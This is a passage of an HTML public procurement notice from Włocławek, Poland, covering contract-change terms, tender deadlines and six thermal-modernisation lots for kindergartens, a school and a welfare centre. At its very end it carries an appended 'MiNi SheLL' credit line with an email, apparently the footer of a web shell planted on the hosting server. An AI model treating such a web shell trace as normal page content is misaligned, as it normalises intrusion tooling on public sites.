(roboty zaniechane), z zastrzeżeniem treści sekcji IV.3. pkt 4; 4) dokonanie zmiany zakresu robót zgłoszonych do podwykonawstwa oraz zmiany podwykonawcy, z zastrzeżeniem treści sekcji IV.3. pkt 5; 5) wprowadzenie robót zamiennych w przypadkach opisanych w treści sekcji IV.3. pkt 2, 6) dokonanie zmiany zakresu robót budowlanych, stanowiących przedmiot zamówienia, na skutek obowiązków, wynikających z decyzji lub uzgodnień uzyskanych po terminie zawarcia umowy; 7) wprowadzenie zmian, wynikających ze zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym bezpośredni wpływ na realizację przedmiotu zamówienia lub świadczenia stron umowy; 8) zmiana albo rezygnacja z podwykonawcy, na którego zasoby wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b ustawy z dnia 29 stycznia 2004 roku - Prawo zamówień publicznych, z zastrzeżeniem treści sekcji IV.3. pkt 6; 9) dokonanie zmiany reprezentantów stron. 2. Konieczność wykonania robót zamiennych, o których mowa w treści sekcji IV.3. pkt 1 ppkt 1 lit. f) oraz w treści sekcji IV.3. pkt 1 ppkt 5, zachodzi w sytuacji, gdy: 1) materiały budowlane, przewidziane w niniejszej umowie do wykonania zamówienia, nie mogą być użyte przy realizacji inwestycji z powodu zaprzestania ich produkcji lub zastąpienia ich innymi materiałami budowlanymi, 2) w trakcie realizacji przedmiotu zamówienia nastąpiła zmiana przepisów prawa budowlanego, 3) w czasie realizacji budowy zmienią się warunki techniczne wykonania (np. Polska Norma), 4) w trakcie realizacji przedmiotu zamówienia zastosowano lepsze materiały budowlane bądź inną technologię wykonania robót. 3. W przypadku, o którym mowa w treści sekcji IV.3. pkt 1 ppkt 2, zmiana zgłoszonych przez Wykonawcę osób, o których mowa w treści § 9 ust. 3 pkt 1 - 2 wzoru umowy, jest możliwa wyłącznie: 1) jeżeli kwalifikacje tych osób będą takie same lub wyższe od kwalifikacji osób wymienionych dotychczas w treści § 9 ust. 3 pkt 1 - 2 wzoru umowy, 2) po złożeniu przez wyznaczone przez Wykonawcę oraz zaakceptowane przez Zamawiającego osoby pisemnego oświadczenia o przejęciu obowiązków osób, o których mowa w treści § 9 ust. 3 pkt 1 - 2 wzoru umowy, wynikających z treści art. 22 ustawy z dnia 07 lipca 1994 roku - Prawo budowlane, z podaniem dnia przejęcia obowiązków. 4. W przypadku, o którym mowa w treści sekcji IV.3. pkt 1 ppkt 3, dokonanie zmiany wynagrodzenia jest możliwe po sporządzeniu przez Wykonawcę protokołu robót zaniechanych, zgodnie z cenami wynikającymi z kosztorysów ofertowych, stanowiących integralną część umowy, a następnie jego zaakceptowaniu przez Zamawiającego. 5. W przypadku, o którym mowa w treści sekcji IV.3. pkt 1 ppkt 4, dokonanie zmiany zakresu robót zgłoszonych do podwykonawstwa oraz zmiany podwykonawcy jest możliwe wyłącznie pod warunkiem wyrażenia zgody przez Zamawiającego na dokonanie zmiany zakresu robót zgłoszonych do podwykonawstwa lub dokonanie zmiany podwykonawcy. 6. W przypadku, o którym mowa w treści sekcji IV.3. pkt 1 ppkt 8, wykonawca jest obowiązany wykazać zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 roku - Prawo zamówień publicznych, w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia, poprzez przedstawienie w tym celu odpowiednich dokumentów, potwierdzających spełnianie warunków udziału w postępowaniu. 7. Wprowadzenie w dokumentacji projektowej zmian, o których mowa w treści sekcji IV.3. pkt 1 ppkt 1 lit. g), nie może skutkować zwiększeniem (zmianą) zakresu świadczenia Wykonawcy zawartego w ofercie oraz zwiększeniem wynagrodzenia Wykonawcy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.um.wlocl.pl/typy-tresci/zamowienia-publiczne/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Włocławek; Biuro Zamówień Publicznych, ul. Kościuszki 12 pok. 15, 87-800 Włocławek.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.05.2016 godzina 08:30, miejsce: Biuro Obsługi Mieszkańców, stanowisko ds. obsługi kancelaryjnej Prezydenta Miasta Włocławek, Urząd Miasta Włocławek, Zielony Rynek 11/13, 87-800 Włocławek.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Termomodernizacja  Przedszkola Publicznego nr 22, ul. Żwirowa 101.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Ocieplenie i pokrycie papą termozgrzewalną dachu
2.	Ocieplenie ścian zewnętrznych
3.	Instalacja odgromowa
4.	Wymiana oświetlenia zewnętrznego na energooszczędne
5.	Montaż ukryć dla ptaków.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres rękojmi na wykonane roboty budowlane - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Termomodernizacja Przedszkola Publicznego nr 27, ul. Cienista 20.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Ocieplenie i pokrycie papą termozgrzewalną dachu
2.	Ocieplenie ścian zewnętrznych
3.	Instalacja solarowa
4.	Instalacja odgromowa
5.	Wymiana oświetlenia zewnętrznego na energooszczędne
6.	Montaż ukryć dla ptaków.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 150.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres rękojmi na wykonane roboty budowlane - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Termomodernizacja Przedszkola Publicznego nr 12, ul. Bukowa 38/40.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Termoizolacja stropodachu i pokrycie dachu papą termozgrzewalną
2.	Wymiana stolarki okiennej i drzwiowej zewnętrznej
3.	Ocieplenie ścian zewnętrznych
4.	Wymiana instalacji c.o. 
5.	Wymiana instalacji odgromowej
6.	Wymiana oświetlenia zewnętrznego na energooszczędne
7.	Montaż ukryć dla ptaków.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 120.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres rękojmi na wykonane roboty budowlane - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Termomodernizacja Zespół Szkół Integracyjnych - budynek B, ul. Wesoła 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Termoizolacja stropodachu i pokrycie dachu papą termozgrzewalną
2.	Ocieplenie ścian zewnętrznych
3.	Wymiana instalacji c.o. 
4.	Wymiana instalacji odgromowej
5.	Wymiana oświetlenia zewnętrznego na energooszczędne
6.	Montaż ukryć dla ptaków.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 120.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres rękojmi na wykonane roboty budowlane - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Termomodernizacja Przedszkola Publicznego nr 19, ul. Urocza 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Termoizolacja stropodachu i pokrycie dachu papą termozgrzewalną
2.	Ocieplenie ścian zewnętrznych
3.	Wymiana instalacji c.o. 
4.	Wymiana inst. wod-kan
5.	Wymiana opraw oświetlenia wew. na energooszczędne
6.	Wymiana instalacji odgromowej
7.	Wymiana oświetlenia zewnętrznego na energooszczędne.
8.	Montaż ukryć dla ptaków.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 150.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Okres rękojmi na wykonane roboty budowlane - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Termomodernizacja Miejskiego Ośrodka Pomocy Rodzinie, ul. Ogniowa 8/10 we Włocławku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Termoizolacja stropodachu i pokrycie dachu papą termozgrzewalną
2.	Wymiana stolarki okiennej i drzwiowej zewnętrznej
3.	Ocieplenie ścian zewnętrznych
4.	Wymiana instalacji c.o. 
5.	Wymiana inst. oświetlenia wen. na energooszczędne
6.	Wymiana instalacji odgromowej
7.	Wymiana oświetlenia zewnętrznego na energooszczędne
8.	Montaż ukryć dla ptaków.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. termin realizacji zamówienia - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com